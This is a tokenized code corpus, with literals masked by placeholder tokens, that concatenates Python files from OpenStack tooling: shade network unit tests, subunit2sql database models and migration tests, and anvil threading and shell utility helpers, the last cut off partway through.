<s> import mock <EOL> import testtools <EOL> import shade <EOL> from shade . tests . unit import base <EOL> class TestNetwork ( base . TestCase ) : <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network ( self , mock_neutron ) : <EOL> self . cloud . create_network ( "<STR_LIT>" ) <EOL> mock_neutron . create_network . assert_called_with ( <EOL> body = dict ( <EOL> network = dict ( <EOL> name = '<STR_LIT>' , <EOL> shared = False , <EOL> admin_state_up = True <EOL> ) <EOL> ) <EOL> ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network_specific_tenant ( self , mock_neutron ) : <EOL> self . cloud . create_network ( "<STR_LIT>" , project_id = "<STR_LIT>" ) <EOL> mock_neutron . create_network . assert_called_with ( <EOL> body = dict ( <EOL> network = dict ( <EOL> name = '<STR_LIT>' , <EOL> shared = False , <EOL> admin_state_up = True , <EOL> tenant_id = "<STR_LIT>" , <EOL> ) <EOL> ) <EOL> ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network_external ( self , mock_neutron ) : <EOL> self . cloud . create_network ( "<STR_LIT>" , external = True ) <EOL> mock_neutron . create_network . assert_called_with ( <EOL> body = dict ( <EOL> network = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True <EOL> } <EOL> ) <EOL> ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network_provider ( self , mock_neutron ) : <EOL> provider_opts = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . cloud . create_network ( "<STR_LIT>" , provider = provider_opts ) <EOL> mock_neutron . create_network . assert_called_once_with ( <EOL> body = dict ( <EOL> network = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> } <EOL> ) <EOL> ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_create_network_provider_ignored_value ( self , mock_neutron ) : <EOL> provider_opts = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> } <EOL> self . cloud . create_network ( "<STR_LIT>" , provider = provider_opts ) <EOL> mock_neutron . create_network . assert_called_once_with ( <EOL> body = dict ( <EOL> network = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> provider_opts [ '<STR_LIT>' ] , <EOL> } <EOL> ) <EOL> ) <EOL> def test_create_network_provider_wrong_type ( self ) : <EOL> provider_opts = "<STR_LIT>" <EOL> with testtools . ExpectedException ( <EOL> shade . OpenStackCloudException , <EOL> "<STR_LIT>" <EOL> ) : <EOL> self . cloud . create_network ( "<STR_LIT>" , provider = provider_opts ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_delete_network ( self , mock_neutron , mock_get ) : <EOL> mock_get . return_value = dict ( id = '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> self . assertTrue ( self . cloud . delete_network ( '<STR_LIT>' ) ) <EOL> mock_get . assert_called_once_with ( '<STR_LIT>' ) <EOL> mock_neutron . delete_network . assert_called_once_with ( network = '<STR_LIT>' ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_delete_network_not_found ( self , mock_get ) : <EOL> mock_get . return_value = None <EOL> self . assertFalse ( self . cloud . delete_network ( '<STR_LIT>' ) ) <EOL> mock_get . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> @ mock . patch . object ( shade . OpenStackCloud , '<STR_LIT>' ) <EOL> def test_delete_network_exception ( self , mock_neutron , mock_get ) : <EOL> mock_get . return_value = dict ( id = '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> mock_neutron . delete_network . side_effect = Exception ( ) <EOL> with testtools . ExpectedException ( <EOL> shade . OpenStackCloudException , <EOL> "<STR_LIT>" <EOL> ) : <EOL> self . cloud . delete_network ( '<STR_LIT>' ) <EOL> mock_get . assert_called_once_with ( '<STR_LIT>' ) <EOL> mock_neutron . delete_network . assert_called_once_with ( network = '<STR_LIT>' ) </s>
<s> import datetime <EOL> import uuid <EOL> from oslo_db . sqlalchemy import models <EOL> import six <EOL> import sqlalchemy as sa <EOL> from sqlalchemy . ext import declarative <EOL> BASE = declarative . declarative_base ( ) <EOL> class SubunitBase ( models . ModelBase ) : <EOL> """<STR_LIT>""" <EOL> __table_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> __table_initialized__ = False <EOL> def save ( self , session = None ) : <EOL> from subunit2sql . db import api as db_api <EOL> super ( SubunitBase , self ) . save ( session or db_api . get_session ( ) ) <EOL> def keys ( self ) : <EOL> return list ( self . __dict__ . keys ( ) ) <EOL> def values ( self ) : <EOL> return self . __dict__ . values ( ) <EOL> def items ( self ) : <EOL> return self . __dict__ . items ( ) <EOL> def to_dict ( self ) : <EOL> d = self . __dict__ . copy ( ) <EOL> d . pop ( "<STR_LIT>" ) <EOL> return d <EOL> class Test ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , <EOL> mysql_length = { '<STR_LIT>' : <NUM_LIT:30> } ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' , <EOL> mysql_length = <NUM_LIT:30> ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> test_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> nullable = False ) <EOL> run_count = sa . Column ( sa . Integer ( ) ) <EOL> success = sa . Column ( sa . Integer ( ) ) <EOL> failure = sa . Column ( sa . Integer ( ) ) <EOL> run_time = sa . Column ( sa . Float ( ) ) <EOL> class Run ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> uuid = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> default = lambda : six . text_type ( uuid . uuid4 ( ) ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> skips = sa . Column ( sa . Integer ( ) ) <EOL> fails = sa . Column ( sa . Integer ( ) ) <EOL> passes = sa . Column ( sa . Integer ( ) ) <EOL> run_time = sa . Column ( sa . Float ( ) ) <EOL> artifacts = sa . Column ( sa . Text ( ) ) <EOL> run_at = sa . Column ( sa . DateTime , <EOL> default = datetime . datetime . utcnow ) <EOL> class TestRun ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT>' , <EOL> name = '<STR_LIT>' ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> test_id = sa . Column ( sa . BigInteger ) <EOL> run_id = sa . Column ( sa . BigInteger ) <EOL> status = sa . Column ( sa . String ( <NUM_LIT> ) ) <EOL> start_time = sa . Column ( sa . DateTime ( ) ) <EOL> start_time_microsecond = sa . Column ( sa . Integer ( ) , default = <NUM_LIT:0> ) <EOL> stop_time = sa . Column ( sa . DateTime ( ) ) <EOL> stop_time_microsecond = sa . Column ( sa . Integer ( ) , default = <NUM_LIT:0> ) <EOL> test = sa . orm . relationship ( Test , backref = sa . orm . backref ( '<STR_LIT>' ) , <EOL> foreign_keys = test_id , <EOL> primaryjoin = test_id == Test . id ) <EOL> run = sa . orm . relationship ( Run , backref = sa . orm . backref ( '<STR_LIT>' ) , <EOL> foreign_keys = run_id , <EOL> primaryjoin = run_id == Run . id ) <EOL> class RunMetadata ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' , <EOL> name = '<STR_LIT>' ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> key = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> value = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> run_id = sa . Column ( sa . BigInteger ) <EOL> run = sa . orm . relationship ( Run , backref = '<STR_LIT>' , foreign_keys = run_id , <EOL> primaryjoin = run_id == Run . id ) <EOL> class TestRunMetadata ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' , <EOL> name = '<STR_LIT>' ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> key = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> value = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> test_run_id = sa . Column ( sa . BigInteger ) <EOL> test_run = sa . orm . relationship ( TestRun , <EOL> backref = sa . orm . backref ( '<STR_LIT>' ) , <EOL> foreign_keys = test_run_id , <EOL> primaryjoin = test_run_id == TestRun . id ) <EOL> class TestMetadata ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ) , <EOL> sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' , <EOL> name = '<STR_LIT>' ) ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> key = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> value = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> test_id = sa . Column ( sa . BigInteger ) <EOL> test = sa . orm . relationship ( Test , backref = '<STR_LIT:test>' , foreign_keys = test_id , <EOL> primaryjoin = test_id == Test . id ) <EOL> class Attachments ( BASE , SubunitBase ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( sa . Index ( '<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> id = sa . Column ( sa . BigInteger , primary_key = True ) <EOL> test_run_id = sa . Column ( sa . BigInteger ) <EOL> label = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> attachment = sa . Column ( sa . LargeBinary ( ) ) <EOL> test_run = sa . orm . relationship ( TestRun , backref = '<STR_LIT>' , <EOL> foreign_keys = test_run_id , <EOL> primaryjoin = test_run_id == TestRun . id ) </s>
<s> import mock <EOL> from oslo_db . sqlalchemy import test_migrations <EOL> import sqlalchemy <EOL> import testscenarios <EOL> from subunit2sql . db import models <EOL> from subunit2sql . tests import base <EOL> from subunit2sql . tests import db_test_utils <EOL> from subunit2sql . tests import subunit2sql_fixtures as fixtures <EOL> load_tests = testscenarios . load_tests_apply_scenarios <EOL> class TestModelsMigrations ( test_migrations . ModelsMigrationsSync , <EOL> base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> scenarios = [ <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ] <EOL> db = mock . MagicMock ( ) <EOL> def setUp ( self ) : <EOL> super ( TestModelsMigrations , self ) . setUp ( ) <EOL> self . useFixture ( fixtures . LockFixture ( self . dialect ) ) <EOL> if not db_test_utils . is_backend_avail ( self . dialect ) : <EOL> raise self . skipTest ( '<STR_LIT>' % self . dialect ) <EOL> if self . dialect == '<STR_LIT>' : <EOL> raise self . skipException ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . dialect == '<STR_LIT>' : <EOL> self . useFixture ( fixtures . MySQLConfFixture ( ) ) <EOL> elif self . dialect == '<STR_LIT>' : <EOL> self . useFixture ( fixtures . PostgresConfFixture ( ) ) <EOL> connect_string = db_test_utils . get_connect_string ( self . dialect ) <EOL> self . engine = sqlalchemy . create_engine ( connect_string ) <EOL> def get_engine ( self ) : <EOL> return self . engine <EOL> def get_metadata ( self ) : <EOL> return models . BASE . metadata <EOL> def db_sync ( self , engine ) : <EOL> db_test_utils . run_migration ( '<STR_LIT>' , engine ) <EOL> def include_object ( self , object_ , name , type_ , reflected , compare_to ) : <EOL> if type_ == '<STR_LIT>' and name == '<STR_LIT>' : <EOL> return False <EOL> return super ( TestModelsMigrations , self ) . include_object ( <EOL> object_ , name , type_ , reflected , compare_to ) <EOL> def filter_metadata_diff ( self , diff ) : <EOL> return filter ( self . remove_unrelated_errors , diff ) <EOL> def remove_unrelated_errors ( self , element ) : <EOL> insp = sqlalchemy . engine . reflection . Inspector . from_engine ( <EOL> self . get_engine ( ) ) <EOL> dialect = self . get_engine ( ) . dialect . name <EOL> if isinstance ( element , tuple ) : <EOL> if dialect == '<STR_LIT>' and element [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> table_name = element [ <NUM_LIT:1> ] . table . name <EOL> for fk in insp . get_foreign_keys ( table_name ) : <EOL> if fk [ '<STR_LIT:name>' ] == element [ <NUM_LIT:1> ] . name : <EOL> return False <EOL> cols = [ c . name for c in element [ <NUM_LIT:1> ] . expressions ] <EOL> for col in cols : <EOL> if col in insp . get_pk_constraint ( <EOL> table_name ) [ '<STR_LIT>' ] : <EOL> return False <EOL> else : <EOL> for modified , _ , table , column , _ , _ , new in element : <EOL> if modified == '<STR_LIT>' and dialect == '<STR_LIT>' : <EOL> constrained = insp . get_pk_constraint ( table ) <EOL> if column in constrained [ '<STR_LIT>' ] : <EOL> return False <EOL> return True </s>
<s> import os <EOL> import re <EOL> from sqlalchemy import create_engine <EOL> from sqlalchemy import event <EOL> def get_url ( ) : <EOL> """<STR_LIT>""" <EOL> db_file_path = os . path . expanduser ( '<STR_LIT>' ) <EOL> return "<STR_LIT>" % db_file_path <EOL> def _re_fn ( expr , item ) : <EOL> "<STR_LIT>" <EOL> reg = re . compile ( expr , re . I ) <EOL> return reg . search ( item ) is not None <EOL> def connect ( ) : <EOL> """<STR_LIT>""" <EOL> engine = create_engine ( get_url ( ) ) <EOL> @ event . listens_for ( engine , "<STR_LIT>" ) <EOL> def do_begin ( conn ) : <EOL> conn . connection . create_function ( '<STR_LIT>' , <NUM_LIT:2> , _re_fn ) <EOL> return engine </s>
<s> import sys <EOL> import threading <EOL> from concurrent import futures <EOL> import six <EOL> from six . moves import queue as compat_queue <EOL> from six . moves import range as compat_range <EOL> from anvil import log as logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> _TOMBSTONE = object ( ) <EOL> def _chained_worker ( ident , shared_death , queue , futs ) : <EOL> running = True <EOL> while running : <EOL> if shared_death . is_set ( ) : <EOL> LOG . warn ( "<STR_LIT>" , ident ) <EOL> running = False <EOL> else : <EOL> w = queue . get ( ) <EOL> if w is _TOMBSTONE : <EOL> queue . put ( w ) <EOL> LOG . info ( "<STR_LIT>" , ident ) <EOL> running = False <EOL> else : <EOL> func , fut = w <EOL> if fut . set_running_or_notify_cancel ( ) : <EOL> try : <EOL> result = func ( ) <EOL> except BaseException : <EOL> LOG . exception ( "<STR_LIT>" , ident ) <EOL> exc_type , exc_val , exc_tb = sys . exc_info ( ) <EOL> if six . PY2 : <EOL> fut . set_exception_info ( exc_val , exc_tb ) <EOL> else : <EOL> fut . set_exception ( exc_val ) <EOL> shared_death . set ( ) <EOL> for fut in futs : <EOL> fut . cancel ( ) <EOL> running = False <EOL> else : <EOL> fut . set_result ( result ) <EOL> class ChainedWorkerExecutor ( object ) : <EOL> def __init__ ( self , max_workers ) : <EOL> self . _workers = [ ] <EOL> self . _max_workers = int ( max_workers ) <EOL> self . _queue = compat_queue . Queue ( ) <EOL> self . _death = threading . Event ( ) <EOL> def run ( self , funcs ) : <EOL> if self . _workers : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( len ( self . _workers ) ) ) <EOL> self . _queue = compat_queue . Queue ( ) <EOL> self . _death . clear ( ) <EOL> futs = [ ] <EOL> for i in compat_range ( <NUM_LIT:0> , self . _max_workers ) : <EOL> w = threading . Thread ( target = _chained_worker , <EOL> args = ( i + <NUM_LIT:1> , self . _death , <EOL> self . _queue , futs ) ) <EOL> w . daemon = True <EOL> w . start ( ) <EOL> self . _workers . append ( w ) <EOL> for func in funcs : <EOL> fut = futures . Future ( ) <EOL> futs . append ( fut ) <EOL> self . _queue . put ( ( func , fut ) ) <EOL> return futs <EOL> def wait ( self ) : <EOL> self . _queue . put ( _TOMBSTONE ) <EOL> while self . _workers : <EOL> w = self . _workers . pop ( ) <EOL> w . join ( ) </s>
<s> import collections <EOL> import contextlib <EOL> import getpass <EOL> import grp <EOL> import gzip as gz <EOL> import os <EOL> import pwd <EOL> import shutil <EOL> import signal <EOL> import socket <EOL> import subprocess <EOL> import time <EOL> import distutils . spawn <EOL> import psutil <EOL> import anvil <EOL> from anvil import env <EOL> from anvil import exceptions as excp <EOL> from anvil import log as logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> SUDO_UID = env . get_key ( '<STR_LIT>' ) <EOL> SUDO_GID = env . get_key ( '<STR_LIT>' ) <EOL> _TRUNCATED_OUTPUT_LINES = <NUM_LIT:7> <EOL> getsize = os . path . getsize <EOL> exists = os . path . exists <EOL> basename = os . path . basename <EOL> dirname = os . path . dirname <EOL> canon_path = os . path . realpath <EOL> prompt = raw_input <EOL> isfile = os . path . isfile <EOL> isdir = os . path . isdir <EOL> islink = os . path . islink <EOL> geteuid = os . geteuid <EOL> getegid = os . getegid <EOL> class Process ( psutil . Process ) : <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . pid , self . name ) <EOL> def execute ( cmd , <EOL> process_input = None , <EOL> check_exit_code = True , <EOL> cwd = None , <EOL> shell = False , <EOL> env_overrides = None , <EOL> stdout_fh = subprocess . PIPE , <EOL> stderr_fh = subprocess . PIPE ) : <EOL> """<STR_LIT>""" <EOL> cmd = map ( str , cmd ) <EOL> str_cmd = subprocess . list2cmdline ( cmd ) <EOL> if shell : <EOL> cmd = str_cmd <EOL> LOG . debug ( '<STR_LIT>' % cmd ) <EOL> else : <EOL> LOG . debug ( '<STR_LIT>' % cmd ) <EOL> if process_input is not None : <EOL> process_input = str ( process_input ) <EOL> LOG . debug ( '<STR_LIT>' % process_input ) <EOL> if cwd : <EOL> LOG . debug ( '<STR_LIT>' % cwd ) <EOL> process_env = None <EOL> if env_overrides and len ( env_overrides ) : <EOL> process_env = env . get ( ) <EOL> for k , v in env_overrides . items ( ) : <EOL> LOG . debug ( "<STR_LIT>" , k , v ) <EOL> process_env [ k ] = str ( v ) <EOL> exec_kwargs = { <EOL> '<STR_LIT>' : subprocess . PIPE , <EOL> '<STR_LIT>' : stdout_fh , <EOL> '<STR_LIT>' : stderr_fh , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : shell , <EOL> '<STR_LIT>' : cwd , <EOL> '<STR_LIT>' : process_env , <EOL> } <EOL> result = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> try : <EOL> obj = subprocess . Popen ( cmd , ** exec_kwargs ) <EOL> result = obj . communicate ( process_input ) <EOL> except OSError as e : <EOL> raise excp . ProcessExecutionError ( <EOL> str_cmd , <EOL> exec_kwargs = exec_kwargs , <EOL> description = "<STR_LIT>" % ( e , e . errno , e . strerror ) <EOL> ) <EOL> else : <EOL> rc = obj . returncode <EOL> stdout = result [ <NUM_LIT:0> ] or "<STR_LIT>" <EOL> stderr = result [ <NUM_LIT:1> ] or "<STR_LIT>" <EOL> if rc != <NUM_LIT:0> and check_exit_code : <EOL> e = excp . ProcessExecutionError ( str_cmd , <EOL> exec_kwargs = exec_kwargs , <EOL> stdout = stdout , <EOL> stderr = stderr , <EOL> exit_code = rc , <EOL> where_output = "<STR_LIT>" ) <EOL> LOG . debug ( "<STR_LIT>" , e . stdout ) <EOL> LOG . debug ( "<STR_LIT>" , e . stderr ) <EOL> raise e <EOL> return stdout , stderr <EOL> def execute_save_output ( cmd , file_name , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs = kwargs . copy ( ) <EOL> mkdirslist ( dirname ( file_name ) ) <EOL> try : <EOL> with open ( file_name , '<STR_LIT:wb>' ) as fh : <EOL> return execute ( cmd , stdout_fh = fh , stderr_fh = fh , ** kwargs ) <EOL> except excp . ProcessExecutionError : <EOL> with excp . reraise ( ) : <EOL> try : <EOL> with open ( file_name , '<STR_LIT:rb>' ) as fh : <EOL> lines = collections . deque ( fh , <EOL> maxlen = _TRUNCATED_OUTPUT_LINES ) <EOL> content = "<STR_LIT>" . join ( lines ) <EOL> except IOError : <EOL> pass <EOL> else : <EOL> LOG . debug ( '<STR_LIT>' , file_name , content ) <EOL> @ contextlib . contextmanager <EOL> def remove_before ( path ) : <EOL> if isdir ( path ) : <EOL> deldir ( path ) <EOL> if isfile ( path ) : <EOL> unlink ( path ) <EOL> yield path <EOL> def gzip ( file_name , gz_archive_name = None ) : <EOL> if not isfile ( file_name ) : <EOL> raise IOError ( "<STR_LIT>" % ( file_name ) ) <EOL> if not gz_archive_name : <EOL> gz_archive_name = "<STR_LIT>" % ( file_name ) <EOL> with contextlib . closing ( gz . open ( gz_archive_name , '<STR_LIT:wb>' ) ) as tz : <EOL> with open ( file_name , '<STR_LIT:rb>' ) as fh : <EOL> tz . write ( fh . read ( ) ) <EOL> return gz_archive_name <EOL> def abspth ( path ) : <EOL> if not path : <EOL> path = "<STR_LIT:/>" <EOL> if path == "<STR_LIT>" : <EOL> path = gethomedir ( ) <EOL> return os . path . abspath ( path ) <EOL> def hostname ( default = '<STR_LIT:localhost>' ) : <EOL> try : <EOL> return socket . gethostname ( ) <EOL> except socket . error : <EOL> return default <EOL> def pipe_in_out ( in_fh , out_fh , chunk_size = <NUM_LIT> , chunk_cb = None ) : <EOL> bytes_piped = <NUM_LIT:0> <EOL> LOG . debug ( "<STR_LIT>" , in_fh , out_fh , chunk_size ) <EOL> while True : <EOL> data = in_fh . read ( chunk_size ) <EOL> if data == '<STR_LIT>' : <EOL> break <EOL> else : <EOL> out_fh . write ( data ) <EOL> bytes_piped += len ( data ) <EOL> if chunk_cb : <EOL> chunk_cb ( bytes_piped ) <EOL> return bytes_piped <EOL> def fileperms ( path ) : <EOL> return ( os . stat ( path ) . st_mode & <NUM_LIT> ) <EOL> def listdir ( path , recursive = False , dirs_only = False , files_only = False , filter_func = None ) : <EOL> path = abspth ( path ) <EOL> all_contents = [ ] <EOL> if not recursive : <EOL> all_contents = os . listdir ( path ) <EOL> all_contents = [ joinpths ( path , f ) for f in all_contents ] <EOL> else : <EOL> for ( root , dirs , files ) in os . walk ( path ) : <EOL> for d in dirs : <EOL> all_contents . append ( joinpths ( root , d ) ) <EOL> for f in files : <EOL> all_contents . append ( joinpths ( root , f ) ) <EOL> if dirs_only : <EOL> all_contents = [ f for f in all_contents if isdir ( f ) ] <EOL> if files_only : <EOL> all_contents = [ f for f in all_contents if isfile ( f ) ] <EOL> if filter_func : <EOL> all_contents = [ f for f in all_contents if filter_func ( f ) ] <EOL> return all_contents <EOL> def joinpths ( * paths ) : <EOL> return os . path . join ( * paths ) <EOL> def get_suids ( ) : <EOL> uid = SUDO_UID <EOL> if uid is not None : <EOL> uid = int ( uid ) <EOL> gid = SUDO_GID <EOL> if gid is not None : <EOL> gid = int ( gid ) <EOL> return ( uid , gid ) <EOL> def chown ( path , uid , gid ) : <EOL> if uid is None : <EOL> uid = - <NUM_LIT:1> <EOL> if gid is None : <EOL> gid = - <NUM_LIT:1> <EOL> if uid == - <NUM_LIT:1> and gid == - <NUM_LIT:1> : <EOL> return <NUM_LIT:0> <EOL> LOG . debug ( "<STR_LIT>" % ( path , uid , gid ) ) <EOL> os . chown ( path , uid , gid ) <EOL> return <NUM_LIT:1> <EOL> def chown_r ( path , uid , gid ) : <EOL> changed = <NUM_LIT:0> <EOL> for ( root , dirs , files ) in os . walk ( path ) : <EOL> changed += chown ( root , uid , gid ) <EOL> for d in dirs : <EOL> dir_pth = joinpths ( root , d ) <EOL> changed += chown ( dir_pth , uid , gid ) <EOL> for f in files : <EOL> fn_pth = joinpths ( root , f ) <EOL> changed += chown ( fn_pth , uid , gid ) <EOL> return changed <EOL> def _explode_path ( path ) : <EOL> dirs = [ ] <EOL> comps = [ ] <EOL> path = abspth ( path ) <EOL> dirs . append ( path ) <EOL> ( head , tail ) = os . path . split ( path ) <EOL> while tail : <EOL> dirs . append ( head ) <EOL> comps . append ( tail ) <EOL> path = head <EOL> ( head , tail ) = os . path . split ( path ) <EOL> dirs . sort ( ) <EOL> comps . reverse ( ) <EOL> return ( dirs , comps ) <EOL> def explode_path ( path ) : <EOL> return _explode_path ( path ) [ <NUM_LIT:0> ] <EOL> def _attempt_kill ( proc , signal_type , max_try , wait_time ) : <EOL> try : <EOL> if not proc . is_running ( ) : <EOL> return ( True , <NUM_LIT:0> ) <EOL> except psutil . error . NoSuchProcess : <EOL> return ( True , <NUM_LIT:0> ) <EOL> killed = False <EOL> attempts = <NUM_LIT:0> <EOL> for _i in range ( <NUM_LIT:0> , max_try ) : <EOL> try : <EOL> LOG . debug ( "<STR_LIT>" % ( proc ) ) <EOL> attempts += <NUM_LIT:1> <EOL> proc . send_signal ( signal_type ) <EOL> LOG . debug ( "<STR_LIT>" % ( wait_time , proc ) ) <EOL> sleep ( wait_time ) <EOL> except psutil . error . NoSuchProcess : <EOL> killed = True <EOL> break <EOL> except Exception as e : <EOL> LOG . debug ( "<STR_LIT>" , proc , e ) <EOL> LOG . debug ( "<STR_LIT>" % ( wait_time , proc ) ) <EOL> sleep ( wait_time ) <EOL> return ( killed , attempts ) <EOL> def kill ( pid , max_try = <NUM_LIT:4> , wait_time = <NUM_LIT:1> ) : <EOL> if not is_running ( pid ) : <EOL> return ( True , <NUM_LIT:0> ) <EOL> proc = Process ( pid ) <EOL> ( killed , i_attempts ) = _attempt_kill ( proc , signal . SIGINT , <EOL> int ( max_try / <NUM_LIT:2> ) , wait_time ) <EOL> if killed : <EOL> return ( True , i_attempts ) <EOL> ( killed , k_attempts ) = _attempt_kill ( proc , signal . SIGKILL , <EOL> int ( max_try / <NUM_LIT:2> ) , wait_time ) <EOL> return ( killed , i_attempts + k_attempts ) <EOL> def is_running ( pid ) : <EOL> try : <EOL> return Process ( pid ) . is_running ( ) <EOL> except psutil . error . NoSuchProcess : <EOL> return False <EOL> def mkdirslist ( path , tracewriter = None ) : <EOL> dirs_possible = explode_path ( path ) <EOL> dirs_made = [ ] <EOL> for dir_path in dirs_possible : <EOL> if not isdir ( dir_path ) : <EOL> mkdir ( dir_path , recurse = False ) <EOL> if tracewriter : <EOL> tracewriter . dirs_made ( dir_path ) <EOL> dirs_made . append ( dir_path ) <EOL> return dirs_made <EOL> def append_file ( fn , text , flush = True , quiet = False ) : <EOL> if not quiet : <EOL> LOG . debug ( "<STR_LIT>" , fn , len ( text ) , ( flush ) ) <EOL> LOG . debug ( "<STR_LIT>" % ( text ) ) <EOL> with open ( fn , "<STR_LIT:a>" ) as f : <EOL> f . write ( text ) <EOL> if flush : <EOL> f . flush ( ) <EOL> return fn <EOL> def write_file ( fn , text , flush = True , quiet = False , tracewriter = None ) : <EOL> if not quiet : <EOL> LOG . debug ( "<STR_LIT>" , fn , len ( text ) , ( flush ) ) <EOL> LOG . debug ( "<STR_LIT>" % ( text ) ) <EOL> mkdirslist ( dirname ( fn ) , tracewriter = tracewriter ) <EOL> with open ( fn , "<STR_LIT:w>" ) as fh : <EOL> if isinstance ( text , unicode ) : <EOL> text = text . encode ( "<STR_LIT:utf-8>" ) <EOL> fh . write ( text ) <EOL> if flush : <EOL> fh . flush ( ) <EOL> if tracewriter : <EOL> tracewriter . file_touched ( fn ) <EOL> def touch_file ( fn , die_if_there = True , quiet = False , file_size = <NUM_LIT:0> , tracewriter = None 